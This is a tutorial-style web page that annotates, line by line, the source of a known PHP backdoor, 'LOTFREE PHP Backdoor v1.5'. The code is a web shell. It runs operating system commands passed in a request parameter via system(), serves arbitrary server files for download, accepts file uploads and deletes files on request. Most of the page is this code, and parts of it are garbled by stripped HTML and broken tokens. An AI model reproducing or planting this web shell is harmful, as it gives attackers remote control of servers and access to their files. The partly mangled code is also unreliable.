Explaining PHP backdoor files

WBOY
Release: 2016-07-25 09:13:33
Original
1976 people have browsed it

PHP Backdoor Version 1.5 is a PHP backdoor program written by sirius_black / LOTFREE TEAM. Here is a simple analysis of it, and it can also be used as a note for learning PHP. The execution of the backdoor program depends on the installation of the web server. With the user's permissions when using php, if you are an administrator, you can execute various operating system commands.

The following is a note on a backdoor


  1. function good_link($link)
  2. {
  3. $link=ereg_replace (“/+”,”/”,$link);
  4. $link=ereg_replace(“/[^/(..)]+/..”,”/”,$link);
  5. $link= ereg_replace(“/+”,”/”,$link);
  6. if(!strncmp($link,”./”,2) && strlen($link)>2)$link=substr($link, 2);
  7. if($link==”")$link=”.”;
  8. return $link;
  9. }
  10. //$_REQUEST is used to obtain the data submitted to this file
  11. $dir= isset($_REQUEST['dir'])?$_REQUEST['dir']:"."; //If dir is not defined, dir takes the default value "."
  12. $dir=good_link($dir);
  13. $rep=opendir($dir); //Open the path handle specified by dir
  14. chdir($dir); //Switch to the directory specified by dir
  15. if(isset($_REQUEST["down"]) &&$_REQUEST ["down"]!="") //If down is defined
  16. {
  17. header("Content-Type: application/octet-stream");
  18. header("Content-Length: ".filesize($ _REQUEST["down"]));
  19. header(“Content-Disposition: attachment; filename=".basename($_REQUEST["down"]));
  20. readfile($_REQUEST["down"]); / /Read the file into the buffer
  21. exit();
  22. }
  23. ?>

  24. LOTFREE PHP Backdoor v1.5, yeetrack. com



  25. echo "The current absolute path is: ".getcwd()."< /b>
    n"; //Get the current absolute path
  26. echo "dir = '$dir'
    n";
  27. echo "Current directory, File list!

    n”;
  28. //If you have entered the command to be executed
  29. if(isset($_REQUEST['cmd']) &&$_REQUEST['cmd']!=” ")
  30. {
  31. echo "
    n";
  32. system($_REQUEST['cmd']); //Execute the entered command on the server, and the execution result will be echoed
  33. echo "n”;
  34. }
  35. //If the file has been uploaded
  36. if(isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"])) // Get the posted file and save it to the current directory
  37. {
  38. if($_FILES["fic"]["size"]<$_POST["MAX_FILE_SIZE"]) //Judge whether the file meets the size specification
  39. {
  40. if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FILES["fic"]["name"]))) //Save the temporary file to the current directory
  41. {
  42. echo "File saved successfully".good_link("./".$_FILES["fic"]["name"])."!
    n";
  43. }
  44. else echo " File upload failed: ".$_FILES["fic"]["error"]."
    n";
  45. }
  46. else echo "File too large (file exceeds size limit)!
    n ";
  47. }
  48. if(isset($_REQUEST['rm']) &&$_REQUEST['rm']!="") //If rm is defined, delete the specified file
  49. {
  50. if (unlink($_REQUEST['rm'])) //unlink is the file deletion function of php
  51. echo "Successfully deleted ".$_REQUEST['rm']."!
    n";
  52. else echo "Failed to delete file
    n";
  53. }
  54. ?>



  55. $t_dir=array();
  56. $t_file=array();
  57. $i_dir=0;
  58. $i_file=0;
  59. // Loop through the directory files before reading and place them in t_dir and t_file
  60. while($x=readdir($rep))
  61. {
  62. if(is_dir($x)) //If the current processing is a directory
  63. $t_dir[$i_dir++]=$x;
  64. else //If the file is currently being processed
  65. $t_file[$i_file++]=$x;
  66. }
  67. closedir($rep); //Close by opendir Open directory handle
  68. while(1) //Loop through the directories and files in the current path
  69. {
  70. ?>




  71. if(!$x && !$y)
  72. break;
  73. }
  74. ?>

  75. if($x=each($t_dir))
  76. {
  77. $name =$x["value"]; //Get the directory name in the t_dir array
  78. if($name=='.'){}
  79. elseif($name=='..') echo " UP (parent directory)

    n"; //Display an UP link and read the file list of the parent directory
  80. else
  81. echo " ".$name."n";
  82. }
  83. ?>
  84. //$_SERVER['PHP_SELF'] Get the current php script file name
  85. if($y =each($t_file))
  86. {
  87. if($y["key"]%2==0) //If the current processing is key
  88. echo ” bgcolor='lightgreen'>n”;
  89. else //If the current processing is value, that is, the file. The file will be displayed and a download link will be provided.
  90. echo “>n”;
  91. echo “ ".$y["value"]."n";
  92. }
  93. else echo ">n";
  94. ?>
  95. if($y)
  96. {
  97. //If it is a file, provide the following link to delete the file
  98. if($y[" key"]%2==0)echo ” bgcolor='lightgreen'";
  99. echo ">Del";
  100. }
  101. else echo ">n";
  102. ?>


  103. < hr>


  104. ?dir=”>revenirau repertoire d'origine

  105. ”>
  106. Execute commande(execute operating system command )


  107. Upload files to Server current directory:

  108. ”>




Copy code





Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template